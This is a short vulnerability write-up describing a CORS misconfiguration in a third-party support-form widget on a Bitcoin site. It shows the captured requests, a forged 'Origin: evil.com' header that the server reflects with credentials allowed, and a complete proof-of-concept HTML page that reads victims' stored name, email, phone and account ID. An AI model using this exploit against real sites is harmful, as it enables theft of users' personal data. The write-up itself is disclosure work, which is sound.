Exploiting Misconfigured CORS on popular BTC Site

Severity: Medium

Complexity: Easy

Weakness: Allowing ACAH

On one of the popular BTC sites I was having an issue with my account, so I used their support form to inform them.

Things I provided via the form:

  1. Email .
  2. Phone Number.
  3. Name.
  4. Message.

I clicked Submit and noticed that the form was being sent to a third-party site.

POST /api/contact/widget/281d02/ HTTP/1.1
Host: api.thirdparty.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


  • After sending the form, I changed the request method to GET,
  • and added Origin: evil.com to the request headers.

GET /api/contact/widget/281d02/ HTTP/1.1
Origin: evil.com

  • Response:

Access-Control-Allow-Origin: evil.com
Access-Control-Allow-Credentials: true


  • Surprised to see Access-Control-Allow-Credentials: true together with the reflected Origin. The PoC page:

<body onload="load()">
<p id="demo"></p>Name: <h3 id="name"></h3>
Email : <h3 id="email"></h3>
Phone : <h3 id="phone"></h3>
ACCID :<h3 id="AccountID"></h3>
<h3 id="que"></h3>
<script>
function load(){
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function(){
    if(this.readyState == 4 && this.status == 200){
      //document.getElementById('demo').innerHTML = JSON.stringify(this.responseText);
      var parsed = JSON.parse(this.responseText);
      var arr = [];
      // flatten the JSON values into an array so fields can be picked by index
      // (indices follow the field order of the widget's response as observed)
      for(var x in parsed){
        arr.push(parsed[x]);
      }
      document.getElementById('email').innerHTML = arr[6];
      document.getElementById('name').innerHTML = arr[3];
      document.getElementById('phone').innerHTML = arr[7];
      document.getElementById('AccountID').innerHTML = arr[9];
    }
  };
  // withCredentials makes the browser attach the victim's cookies for api.thirdparty.com;
  // because the server echoes the Origin and sets ACAC: true, the response becomes readable here
  xhr.open('GET', 'https://api.thirdparty.com/api/contact/widget/281d02/', true);
  xhr.withCredentials = true;
  xhr.send();
}
</script>
</body>
  • As soon as the victim (any user who has used their support form at any time, including on a previous date) visits the malicious page, their previously submitted form data is extracted.

Security Analyst
